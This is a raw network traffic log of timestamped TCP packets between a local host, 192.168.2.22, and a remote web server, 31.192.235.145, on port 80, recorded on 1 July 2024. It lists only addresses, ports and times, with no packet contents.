                        Jul 1, 2024 13:58:02.395821095 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.395821095 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.395845890 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.395879984 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.395889997 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.395889997 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.395915031 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.395939112 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.395948887 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.395983934 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.395988941 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.395988941 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396017075 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396050930 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396056890 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396056890 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396087885 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396131039 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396131039 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396138906 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396189928 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396195889 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396224022 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396243095 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396258116 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396286011 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396291971 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396301031 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396325111 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396358013 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396367073 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396367073 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396390915 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396425009 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396431923 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396431923 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396460056 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396476030 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396507025 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396528006 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396557093 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396590948 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396598101 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396598101 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396625042 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396634102 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396658897 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396670103 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396692991 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396727085 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396733046 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396733046 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396775007 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396779060 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396812916 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396840096 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396846056 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396864891 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396879911 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396899939 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396914005 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396943092 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.396960020 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396960020 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.396975994 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.397011995 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.397017002 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.397017002 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.397044897 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.397056103 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.397078991 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.397090912 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.397113085 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.397133112 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.397147894 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.397180080 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.397185087 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.397185087 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.397213936 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.397242069 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.397248030 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.397253036 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.397283077 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.397304058 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.397305965 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.397320032 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.397336006 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.397339106 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.397339106 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.397351027 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.397372007 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.397376060 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.397376060 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.397387028 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.397394896 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.397403955 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.397406101 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.397433996 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.397433996 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482021093 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482060909 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482079983 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482124090 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482156038 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482175112 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482182026 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482214928 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482260942 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482260942 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482268095 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482300997 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482332945 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482352018 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482357979 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482384920 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482433081 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482434988 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482484102 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482485056 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482527018 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482534885 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482564926 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482611895 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482616901 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482650042 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482676983 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482685089 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482697964 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482718945 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482738972 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482752085 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482781887 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482808113 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482840061 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482851028 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482851028 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482892036 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482896090 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482925892 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482959032 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482971907 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482971907 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.482990980 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.482995987 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483043909 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483050108 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483076096 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483109951 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483141899 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483155966 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483155966 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483176947 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483211040 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483217955 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483226061 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483259916 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483277082 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483293056 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483319044 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483330011 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483364105 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483381987 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483381987 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483390093 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483397007 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483431101 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483450890 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483464956 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483500957 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483509064 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483509064 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483535051 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483567953 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483577013 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483577967 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483602047 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483650923 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483650923 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483653069 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483685970 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483721018 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483728886 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483728886 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483753920 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483772039 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483786106 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483799934 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483819962 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483851910 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483885050 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483886003 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483918905 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.483921051 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483967066 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483967066 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.483969927 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484004021 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484019995 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484055996 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484086990 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484090090 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484123945 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484127998 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484157085 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484189034 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484199047 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484199047 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484222889 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484226942 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484256983 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484270096 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484289885 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484318018 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484323978 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484343052 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484358072 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484390974 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484397888 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484441996 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484476089 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484499931 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484540939 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484546900 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484580040 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484631062 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484635115 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484663963 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484694004 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484709978 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484709978 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484728098 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484756947 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484761000 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484802008 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484816074 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484853029 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484864950 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484865904 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484898090 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484934092 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.484951019 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.484967947 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485002041 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485013008 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485013008 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485034943 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485060930 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485069036 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485086918 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485104084 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485136032 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485140085 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485172987 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485187054 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485208988 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485235929 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485241890 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485275984 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485280991 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485280991 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485311031 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485343933 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485354900 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485378027 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485404968 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485411882 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485435963 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485445023 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485461950 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485477924 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485486984 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485512018 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485522985 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485546112 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485572100 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485578060 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485611916 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485613108 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485631943 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485646009 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485678911 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485711098 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485728979 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485728979 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485743046 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485775948 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485780001 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485780001 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485809088 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485841990 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485873938 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485882998 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485882998 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485908031 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485939980 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.485944033 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.485946894 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.486143112 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.524815083 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.524857044 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.524883986 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.524899960 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.524915934 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.524925947 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.524925947 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.524938107 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.524950027 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.524950027 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.524955988 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.525017023 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.572227001 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.572294950 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.572323084 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.572340965 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.572345972 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.572393894 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.572402954 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.572462082 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.572462082 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.572510004 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.572559118 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.572594881 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.572607040 CEST  49164  80  192.168.2.22  31.192.235.145
                        Jul 1, 2024 13:58:02.572645903 CEST  80  49164  31.192.235.145  192.168.2.22
                        Jul 1, 2024 13:58:02.572650909 CEST  49164  80  192.168.2.22  31.192.235.145
